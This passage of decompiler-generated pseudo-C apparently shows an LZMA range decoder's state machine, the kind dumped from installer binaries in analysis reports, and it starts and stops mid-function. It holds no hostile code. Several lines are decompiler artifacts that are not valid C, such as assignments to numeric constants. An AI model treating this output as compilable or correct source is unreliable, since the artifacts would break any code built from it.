                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 8:
                          											goto L0;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L89;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t258;
                          											0 | _t258 = _t258 + _t258 + 9;
                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          											goto L75;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L88;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L88:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L89:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 0x12:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *(__ebp - 0x7c) = 0x14;
                          												goto L145;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											 *(_t613 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											L145:
                          											__eax =  *(__ebp - 0x40);
                          											 *(__ebp - 0x50) = 1;
                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          											goto L149;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											L149:
                          											__eflags =  *(__ebp - 0x48);
                          											if( *(__ebp - 0x48) <= 0) {
                          												__ecx =  *(__ebp - 0x40);
                          												__ebx =  *(__ebp - 0x50);
                          												0 = 1;
                          												__eax = 1 << __cl;
                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          												__eax =  *(__ebp - 0x7c);
                          												 *(__ebp - 0x44) = __ebx;
                          												while(1) {
                          													 *(_t613 - 0x88) = _t533;
                          													goto L1;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x50);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          											__eax =  *(__ebp - 0x58);
                          											__esi = __edx + __eax;
                          											 *(__ebp - 0x54) = __esi;
                          											__ax =  *__esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												__cx = __ax >> 5;
                          												__eax = __eax - __ecx;
                          												__edx = __edx + 1;
                          												__eflags = __edx;
                          												 *__esi = __ax;
                          												 *(__ebp - 0x50) = __edx;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L148;
                          											} else {
                          												goto L146;
                          											}
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														goto L109;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													goto L99;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L79;
                          										case 0x1b:
                          											L75:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t274 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t274;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t283 = __ebp - 0x64;
                          											 *_t283 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t283;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L79:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L80;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
